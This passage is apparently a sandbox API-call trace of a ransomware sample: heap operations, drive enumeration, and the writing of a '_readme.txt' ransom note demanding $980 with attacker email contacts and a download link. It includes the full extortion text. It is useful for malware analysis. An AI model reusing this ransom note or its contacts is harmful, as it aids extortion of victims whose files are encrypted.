KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----" [0198.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d9600 | out: hHeap=0x2c0000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bffb0 [0198.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x32d7d08 [0198.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32bffb0, cbMultiByte=-1, lpWideCharStr=0x32d7d08, cchWideChar=1064 | out: lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned 41 [0198.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x32ea568 [0198.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bffb0 | out: hHeap=0x2c0000) returned 1 [0198.286] lstrcpyW (in: lpString1=0x521cf0, lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0198.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea568 | out: hHeap=0x2c0000) returned 1 [0198.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bff40 | out: hHeap=0x2c0000) returned 1 [0198.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327020 | out: hHeap=0x2c0000) returned 1 [0198.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32dbbe8 | out: hHeap=0x2c0000) returned 1 Thread: id = 295 os_tid = 0x600 [0198.962] timeGetTime () returned 0x113cbe4 [0198.962] GetLastError () returned 0x54f [0198.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x32da630 [0198.963] GetCurrentThreadId () returned 0x600 [0198.963] SetLastError (dwErrCode=0x54f) [0198.963] Sleep (dwMilliseconds=0x0) [0198.966] Sleep (dwMilliseconds=0x3e8) [0200.594] GetLogicalDrives () returned 0x4 [0200.630] SetErrorMode (uMode=0x1) returned 0x0 [0200.630] PathFileExistsA (pszPath="C:\\") returned 1 [0200.631] SetErrorMode (uMode=0x0) returned 0x1 [0200.631] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0200.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x336f4d0 [0200.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39cfe60, cbMultiByte=-1, lpWideCharStr=0x336f4d0, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0200.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b15058 [0200.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b3760 [0200.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15058 | out: hHeap=0x2c0000) returned 1 [0200.659] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b25058 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25058 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.668] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.668] PathFindFileNameW (pszPath="") returned="" [0200.668] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.668] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x336f4d0 [0200.668] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b65058 [0200.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.668] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x336f4d0 [0200.674] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0200.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b65058 [0200.674] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0200.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b65870 [0200.675] lstrcpyW (in: lpString1=0x3b65870, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.675] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 